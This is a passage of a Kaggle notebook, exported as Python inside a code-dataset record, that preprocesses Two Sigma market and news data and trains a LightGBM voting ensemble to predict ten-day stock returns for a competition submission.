]:\n\n\ndel thisAssetMark_df\ndel news_relevance\ndel market_train_fill\ndel news_train_df\ndel news_rmv_outlier\n\n# \n# \n# ## Preprocessing\n\n# In[ ]:\n\n\nmarket_train_orig = market_train_orig.sort_values('time')\nnews_train_orig = news_train_orig.sort_values('time')\nmarket_train_df = market_train_orig.copy()\nnews_train_df = news_train_orig.copy()\ndel market_train_orig\ndel news_train_orig\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['time'].dt.date>=datetime.date(2009,1,1)]\nnews_train_df = news_train_df.loc[news_train_df['time'].dt.date>=datetime.date(2009,1,1)]\n\n# ### Market data\n# * **Outliers - Open to close:** the difference between open price and close price cannot be too much difference (market would corrupt otherwise). We treat these outliers by clipping the close-to-open ratio\n\n# In[ ]:\n\n\nmarket_train_df['close_open_ratio'] = np.abs(market_train_df['close']/market_train_df['open'])\nthreshold = 0.5\nprint('In %i lines price increases by 50%% or more in a day' %(market_train_df['close_open_ratio']>=1.5).sum())\nprint('In %i lines price decreases by 50%% or more in a day' %(market_train_df['close_open_ratio']<=0.5).sum())\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['close_open_ratio'] < 1.5]\nmarket_train_df = market_train_df.loc[market_train_df['close_open_ratio'] > 0.5]\nmarket_train_df = market_train_df.drop(columns=['close_open_ratio'])\n\n# * **Fill nulls - Market values:** All null data comes from market adjusted columns. We fill them up with the raw values in the same row\n\n# In[ ]:\n\n\ncolumn_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\ncolumn_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\nfor i in range(len(column_raw)):\n market_train_df[column_market[i]] = market_train_df[column_market[i]].fillna(market_train_df[column_raw[i]])\n\n# * **Outliers-Returns:** Return should not exceed 50% or falls below 50%. If it does, it is either noise, or extreme data that will confuse our prediction later on. 
We remove these extreme data.\n\n# In[ ]:\n\n\nprint('Removing outliers ...')\ncolumn_return = column_market + column_raw + ['returnsOpenNextMktres10']\norig_len = market_train_df.shape[0]\nfor column in column_return:\n market_train_df = market_train_df.loc[market_train_df[column]>=-2]\n market_train_df = market_train_df.loc[market_train_df[column]<=2]\nnew_len = market_train_df.shape[0]\nrmv_len = np.abs(orig_len-new_len)\nprint('There were %i lines removed' %rmv_len)\n\n# * **Remove strange data**: Here we remove data with unknown asset name or asset codes with strange behavior. For more details, see here: https://www.kaggle.com/nareyko/market-return-estimation-and-bad-data-detection\n\n# In[ ]:\n\n\nprint('Removing strange data ...')\norig_len = market_train_df.shape[0]\nmarket_train_df = market_train_df[~market_train_df['assetCode'].isin(['PGN.N','EBRYY.OB'])]\n#market_train_df = market_train_df[~market_train_df['assetName'].isin(['Unknown'])]\nnew_len = market_train_df.shape[0]\nrmv_len = np.abs(orig_len-new_len)\nprint('There were %i lines removed' %rmv_len)\n\n# ### News data\n# * **Remove outliers**: apply a clip filter to reduce too extreme data\n\n# In[ ]:\n\n\n# Function to remove outliers\ndef remove_outliers(data_frame, column_list, low=0.02, high=0.98):\n for column in column_list:\n this_column = data_frame[column]\n quant_df = this_column.quantile([low,high])\n low_limit = quant_df[low]\n high_limit = quant_df[high]\n data_frame[column] = data_frame[column].clip(lower=low_limit, upper=high_limit)\n return data_frame\n\n# In[ ]:\n\n\n# Remove outlier\ncolumns_outlier = ['takeSequence', 'bodySize', 'sentenceCount', 'wordCount', 'sentimentWordCount', 'firstMentionSentence','noveltyCount12H',\\\n 'noveltyCount24H', 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D', 'volumeCounts12H', 'volumeCounts24H',\\\n 'volumeCounts3D','volumeCounts5D','volumeCounts7D']\nprint('Clipping news outliers ...')\nnews_train_df = remove_outliers(news_train_df, columns_outlier)\n\n# \n# \n# ## Features engineering\n# \n# ### Data processing function\n# Here we make a function process both market and news data, then merge them.\n# \n\n# In[ ]:\n\n\nasset_code_dict = {k: v for v, k in enumerate(market_train_df['assetCode'].unique())}\ndrop_columns = [col for col in news_train_df.columns if col not in ['sourceTimestamp', 'urgency', 'takeSequence', 'bodySize', 'companyCount', \n 'sentenceCount', 'firstMentionSentence', 'relevance','firstCreated', 'assetCodes']]\ncolumns_news = ['firstCreated','relevance','sentimentClass','sentimentNegative','sentimentNeutral',\n 'sentimentPositive','noveltyCount24H','noveltyCount7D','volumeCounts24H','volumeCounts7D','assetCodes','sourceTimestamp',\n 'assetName','audiences', 'urgency', 'takeSequence', 'bodySize', 'companyCount', \n 'sentenceCount', 'firstMentionSentence','time']\n\n# In[ ]:\n\n\n# Data processing function\ndef data_prep(market_df,news_df):\n market_df['date'] = market_df.time.dt.date\n market_df['close_to_open'] = market_df['close'] / market_df['open']\n market_df.drop(['time'], axis=1, inplace=True)\n \n news_df = news_df[columns_news]\n news_df['sourceTimestamp']= news_df.sourceTimestamp.dt.hour\n news_df['firstCreated'] = news_df.firstCreated.dt.date\n news_df['assetCodesLen'] = news_df['assetCodes'].map(lambda x: len(eval(x)))\n news_df['assetCodes'] = news_df['assetCodes'].map(lambda x: list(eval(x))[0])\n news_df['asset_sentiment_count'] = news_df.groupby(['assetName', 'sentimentClass'])['time'].transform('count')\n news_df['len_audiences'] = 
news_train_df['audiences'].map(lambda x: len(eval(x)))\n kcol = ['firstCreated', 'assetCodes']\n news_df = news_df.groupby(kcol, as_index=False).mean()\n market_df = pd.merge(market_df, news_df, how='left', left_on=['date', 'assetCode'], \n right_on=['firstCreated', 'assetCodes'])\n del news_df\n market_df['assetCodeT'] = market_df['assetCode'].map(asset_code_dict)\n market_df = market_df.drop(columns = ['firstCreated','assetCodes','assetName']).fillna(0) \n return market_df\n\n# In[ ]:\n\n\nprint('Merging data ...')\nmarket_train_df = data_prep(market_train_df, news_train_df)\nmarket_train_df.head()\n\n# \n# \n# ### Data selection\n# \n# Looking at the statistics, most data behave homogeneously after 2009 (volume increase, price increase, etc.). However, before 2009, due to the burst of the housing bubble that leads to the financial crisis in 2008, the data behaves differently. So the question to make the right prediction for this problem is: **Will there be a financial crisis in the next 6 months?** If the answer is **Yes**, then we include data before 2009. If the answer is **No**, then we exclude them.\n# \n# In this notebook, I choose **No** as the answer and proceed from that.\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['date']>=datetime.date(2009,1,1)]\n\n# We then perform feature selection . Feature scaling is not needed since we plan to use lightgbm - a tree-based model, which do not require standardization.\n# \n# I tried using a regressor model, but a problem is that it gives close-to-0 values for most of prediction. Thus, I convert this problem into a classification problem: 0 for negative return and 1 for positive return\n\n# In[ ]:\n\n\nnum_columns = ['volume', 'close', 'open', 'returnsClosePrevRaw1', 'returnsOpenPrevRaw1', 'returnsClosePrevMktres1', 'returnsOpenPrevMktres1', 'returnsClosePrevRaw10', 'returnsOpenPrevRaw10', \n 'returnsClosePrevMktres10', 'returnsOpenPrevMktres10', 'close_to_open', 'sourceTimestamp', 'urgency', 'companyCount', 'takeSequence', 'bodySize', 'sentenceCount',\n 'relevance', 'sentimentClass', 'sentimentNegative', 'sentimentNeutral', 'sentimentPositive',\n 'noveltyCount24H','noveltyCount7D','volumeCounts24H','volumeCounts7D','assetCodesLen', 'asset_sentiment_count', 'len_audiences']\ncat_columns = ['assetCodeT']\nfeature_columns = num_columns+cat_columns\n\n# In[ ]:\n\n\n# Scaling of data\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\ndata_scaler = StandardScaler()\n#market_train_df[num_columns] = data_scaler.fit_transform(market_train_df[num_columns])\n#data_scaler = MinMaxScaler()\nmarket_train_df[num_columns] = data_scaler.fit_transform(market_train_df[num_columns])\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nmarket_train_df = market_train_df.reset_index()\nmarket_train_df = market_train_df.drop(columns='index')\n\n# Random train-test split\ntrain_indices, val_indices = train_test_split(market_train_df.index.values,test_size=0.1, random_state=92)\n\n# In[ ]:\n\n\n# Extract X and Y\ndef get_input(market_train, indices):\n X = market_train.loc[indices, feature_columns].values\n y = market_train.loc[indices,'returnsOpenNextMktres10'].map(lambda x: 0 if x<0 else 1).values\n #y = market_train.loc[indices,'returnsOpenNextMktres10'].map(lambda x: convert_to_class(x)).values\n r = market_train.loc[indices,'returnsOpenNextMktres10'].values\n u = market_train.loc[indices, 'universe']\n d = market_train.loc[indices, 'date']\n return X,y,r,u,d\n\n# r, u and d are used to calculate the 
scoring metric\nX_train,y_train,r_train,u_train,d_train = get_input(market_train_df, train_indices)\nX_val,y_val,r_val,u_val,d_val = get_input(market_train_df, val_indices)\n\n# \n# \n# ## Building model\n# \n# Here we use lightgbm classifier as our model\n# \n# ### Parameters tuning\n\n# In[ ]:\n\n\n# Set up decay learning rate\ndef learning_rate_power(current_round):\n base_learning_rate = 0.19000424246380565\n min_learning_rate = 0.01\n lr = base_learning_rate * np.power(0.995,current_round)\n return max(lr, min_learning_rate)\n\n# In[ ]:\n\n\nfrom scipy.stats import randint as sp_randint\nfrom scipy.stats import uniform as sp_uniform\n\ntune_params = {'n_estimators': [200,500,1000,2500,5000],\n 'max_depth': sp_randint(4,12),\n 'colsample_bytree':sp_uniform(loc=0.8, scale=0.15),\n 'min_child_samples':sp_randint(60,120),\n 'subsample': sp_uniform(loc=0.75, scale=0.25),\n 'reg_lambda':[1e-3, 1e-2, 1e-1, 1]}\n\nfit_params = {'early_stopping_rounds':40,\n 'eval_metric': 'accuracy',\n 'eval_set': [(X_train, y_train), (X_val, y_val)],\n 'verbose': 20,\n 'callbacks': [lgb.reset_parameter(learning_rate=learning_rate_power)]}\n\n# In[ ]:\n\n\nlgb_clf = lgb.LGBMClassifier(n_jobs=4, objective='binary',random_state=1)\ngs = RandomizedSearchCV(estimator=lgb_clf, \n param_distributions=tune_params, \n n_iter=40,\n scoring='f1',\n cv=5,\n refit=True,\n random_state=1,\n verbose=True)\n\n# Running the parameters search will take another 3 hours, so we will straight away use the best parameters \n\n# In[ ]:\n\n\nlgb_clf = lgb.LGBMClassifier(n_jobs=4,\n objective='multiclass',\n random_state=100)\nopt_params = {'n_estimators':500,\n 'boosting_type': 'dart',\n 'objective': 'binary',\n 'num_leaves':2452,\n 'min_child_samples':212,\n 'reg_lambda':0.01}\nlgb_clf.set_params(**opt_params)\nlgb_clf.fit(X_train, y_train,**fit_params)\n\n# In[ ]:\n\n\nprint('Training accuracy: ', accuracy_score(y_train, lgb_clf.predict(X_train)))\nprint('Validation accuracy: ', accuracy_score(y_val, lgb_clf.predict(X_val)))\n\n# \n# \n# ### Visualizing the result\n\n# In[ ]:\n\n\nfeatures_imp = pd.DataFrame()\nfeatures_imp['features'] = list(feature_columns)[:]\nfeatures_imp['importance'] = lgb_clf.feature_importances_\nfeatures_imp = features_imp.sort_values(by='importance', ascending=False).reset_index()\n\ny_plot = -np.arange(15)\nplt.figure(figsize=(10,6))\nplt.barh(y_plot, features_imp.loc[:14,'importance'].values)\nplt.yticks(y_plot,(features_imp.loc[:14,'features']))\nplt.xlabel('Feature importance')\nplt.title('Features importance')\nplt.tight_layout()\n\n# In[ ]:\n\n\n# Rescale confidence\ndef rescale(data_in, data_ref):\n scaler_ref = StandardScaler()\n scaler_ref.fit(data_ref.reshape(-1,1))\n scaler_in = StandardScaler()\n data_in = scaler_in.fit_transform(data_in.reshape(-1,1))\n data_in = scaler_ref.inverse_transform(data_in)[:,0]\n return data_in\n\n# In[ ]:\n\n\ndef confidence_out(y_pred):\n confidence = np.zeros(y_pred.shape[0])\n for i in range(len(confidence)):\n if y_pred[i,:].argmax() != 1:\n confidence[i] = y_pred[i,2]-y_pred[i,0]\n return confidence\n\n# In[ ]:\n\n\ny_pred_proba = lgb_clf.predict_proba(X_val)\npredicted_return = y_pred_proba[:,1] - y_pred_proba[:,0]\n#predicted_return = confidence_out(y_pred_proba)\npredicted_return = rescale(predicted_return, r_train)\n\n# In[ ]:\n\n\n# distribution of confidence that will be used as submission\nplt.hist(predicted_return, bins='auto', label='Predicted confidence')\nplt.hist(r_val, bins='auto',alpha=0.8, label='True market return')\nplt.title(\"predicted 
confidence\")\nplt.legend(loc='best')\nplt.xlim(-1,1)\nplt.show()\n\n# In[ ]:\n\n\n# calculation of actual metric that is used to calculate final score\nr_val = r_val.clip(-1,1) # get rid of outliers.\nx_t_i = predicted_return * r_val * u_val\ndata = {'day' : d_val, 'x_t_i' : x_t_i}\ndf = pd.DataFrame(data)\nx_t = df.groupby('day').sum().values.flatten()\nmean = np.mean(x_t)\nstd = np.std(x_t)\nscore_valid = mean / std\nprint('Validation score', score_valid)\n\n# \n# ### Voting ensemble\n# Now we construct an ensemble of multiple classifier and use soft voting to get the final result\n\n# In[ ]:\n\n\n# This code is inspired from this kernel: https://www.kaggle.com/skooch/lgbm-w-random-split-2\nclfs = []\nfor i in range(20):\n clf = lgb.LGBMClassifier(learning_rate=0.1, random_state=1200+i, silent=True,\n n_jobs=4, n_estimators=2500)\n clf.set_params(**opt_params)\n clfs.append(('lgbm%i'%i, clf))\n\ndef split_data(X, y, test_percentage=0.2, seed=None):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_percentage)\n return X_train, y_train, X_test, y_test \n\ndef _parallel_fit_estimator(estimator, X, y, sample_weight=None, **fit_params):\n \n # randomly split the data so we have a test set for early stopping\n X_train, y_train, X_test, y_test = split_data(X, y, seed=1992)\n \n # update the fit params with our new split\n fit_params[\"eval_set\"] = [(X_train,y_train), (X_test,y_test)]\n \n # fit the estimator\n if sample_weight is not None:\n estimator.fit(X_train, y_train, sample_weight=sample_weight, **fit_params)\n else:\n estimator.fit(X_train, y_train, **fit_params)\n return estimator\n\n# In[ ]:\n\n\nclass VotingClassifierLGBM(VotingClassifier):\n '''\n This implements the fit method of the VotingClassifier propagating fit_params\n '''\n def fit(self, X, y, sample_weight=None, **fit_params):\n \n if isinstance(y, np.ndarray) and len(y.shape) > 1 and y.shape[1] > 1:\n raise NotImplementedError('Multilabel and multi-output'\n ' classification is not supported.')\n\n if self.voting not in ('soft', 'hard'):\n raise ValueError(\"Voting must be 'soft' or 'hard'; got (voting=%r)\"\n % self.voting)\n\n if self.estimators is None or len(self.estimators) == 0:\n raise AttributeError('Invalid `estimators` attribute, `estimators`'\n ' should be a list of (string, estimator)'\n ' tuples')\n\n if (self.weights is not None and\n len(self.weights) != len(self.estimators)):\n raise ValueError('Number of classifiers and weights must be equal'\n '; got %d weights, %d estimators'\n % (len(self.weights), len(self.estimators)))\n\n if sample_weight is not None:\n for name, step in self.estimators:\n if not has_fit_parameter(step, 'sample_weight'):\n raise ValueError('Underlying estimator \\'%s\\' does not'\n ' support sample weights.' % name)\n names, clfs = zip(*self.estimators)\n self._validate_names(names)\n\n n_isnone = np.sum([clf is None for _, clf in self.estimators])\n if n_isnone == len(self.estimators):\n raise ValueError('All estimators are None. 
At least one is '\n 'required to be a classifier!')\n\n self.le_ = LabelEncoder().fit(y)\n self.classes_ = self.le_.classes_\n self.estimators_ = []\n\n transformed_y = self.le_.transform(y)\n\n self.estimators_ = Parallel(n_jobs=self.n_jobs)(\n delayed(_parallel_fit_estimator)(clone(clf), X, transformed_y,\n sample_weight=sample_weight, **fit_params)\n for clf in clfs if clf is not None)\n\n return self\n\n# In[ ]:\n\n\nvc = VotingClassifierLGBM(clfs, voting='soft')\nvc.fit(X_train, y_train, **fit_params)\nfilename = 'VotingClassifierLGBM.sav'\npickle.dump(vc, open(filename, 'wb'))\n\n# In[ ]:\n\n\nvc = pickle.load(open(filename, 'rb'))\nvc.voting = 'soft'\npredicted_class = vc.predict(X_val)\npredicted_return = vc.predict_proba(X_val)\n#predicted_return = confidence_out(predicted_return)\npredicted_return = vc.predict_proba(X_val)[:,1]*2-1\npredicted_return = rescale(predicted_return, r_train)\n\n# In[ ]:\n\n\nplt.hist(predicted_class, bins='auto')\n\n# In[ ]:\n\n\nvc.voting = 'soft'\nglobal_accuracy_soft = accuracy_score(y_val, predicted_class)\nglobal_f1_soft = f1_score(y_val, predicted_class)\nprint('Accuracy score clfs: %f' % global_accuracy_soft)\nprint('F1 score clfs: %f' % global_f1_soft)\n\n# In[ ]:\n\n\n# distribution of confidence that will be used as submission\nplt.hist(predicted_return, bins='auto', label='Prediciton')\nplt.hist(r_val, bins='auto',alpha=0.8, label='True data')\nplt.title(\"predicted confidence\")\nplt.legend(loc='best')\nplt.xlim(-1,1)\nplt.show()\n\n# In[ ]:\n\n\n# calculation of actual metric that is used to calculate final score\nr_val = r_val.clip(-1,1) # get rid of outliers. Where do they come from??\nx_t_i = predicted_return * r_val * u_val\ndata = {'day' : d_val, 'x_t_i' : x_t_i}\ndf = pd.DataFrame(data)\nx_t = df.groupby('day').sum().values.flatten()\nmean = np.mean(x_t)\nstd = np.std(x_t)\nscore_valid = mean / std\nprint('Validation score', score_valid)\n\n# \n# ## Making submission\n\n# In[ ]:\n\n\ndays = env.get_prediction_days()\nn_days = 0\nprep_time = 0\nprediction_time = 0\npackaging_time = 0\nfor (market_obs_df, news_obs_df, predictions_template_df) in days:\n n_days +=1\n if n_days % 50 == 0:\n print(n_days,end=' ')\n\n t = time.time()\n column_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\n column_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\n market_obs_df['close_open_ratio'] = np.abs(market_obs_df['close']/market_obs_df['open'])\n for i in range(len(column_raw)):\n market_obs_df[column_market[i]] = market_obs_df[column_market[i]].fillna(market_obs_df[column_raw[i]])\n\n market_obs_df = market_obs_df[market_obs_df.assetCode.isin(predictions_template_df.assetCode)]\n market_obs_df = market_obs_df[market_obs_df.assetCode.isin(asset_code_dict.keys())]\n market_obs = data_prep(market_obs_df, news_obs_df)\n market_obs[num_columns] = data_scaler.transform(market_obs[num_columns])\n X_live = market_obs[feature_columns].values\n prep_time += time.time() - t\n\n t = time.time()\n lp = vc.predict_proba(X_live)\n prediction_time += time.time() -t\n\n t = time.time()\n confidence = lp[:,1] - lp[:,0]\n #confidence = confidence_out(lp)\n confidence = rescale(confidence, r_train)\n preds = pd.DataFrame({'assetCode':market_obs['assetCode'],'confidence':confidence})\n predictions_template_df = predictions_template_df.merge(preds,how='left').drop('confidenceValue',axis=1).fillna(0).rename(columns={'confidence':'confidenceValue'})\n 
env.predict(predictions_template_df)\n packaging_time += time.time() - t\n\nenv.write_submission_file()\n\n# In[ ]:\n\n\nplt.hist(confidence, bins='auto')\nplt.title(\"predicted confidence\")\nplt.show()\n\n# This concludes my work for this problem. Please let me know if you have any suggestion. Thank you\n\n# \n", "repo_name": "tetherless-world/CodeGraph", "sub_path": "kaggle/python_files/sample166.py", "file_name": "sample166.py", "file_ext": "py", "file_size_in_byte": 41922, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.rcParams", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 32, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 35, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 61, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 62, "usage_type": "attribute"}, {"api_name": "kaggle.competitions.twosigmanews.make_env", "line_number": 69, "usage_type": "call"}, {"api_name": "kaggle.competitions.twosigmanews", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 230, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 231, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 262, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
307, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 320, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 322, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 322, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 323, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 323, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 337, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 338, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 338, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 340, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 347, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 358, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 360, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 361, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 361, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 362, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 362, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 370, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 370, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 373, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 373, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 383, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 383, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 384, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 391, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 406, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 406, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 407, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 407, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 408, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 408, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 451, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 451, 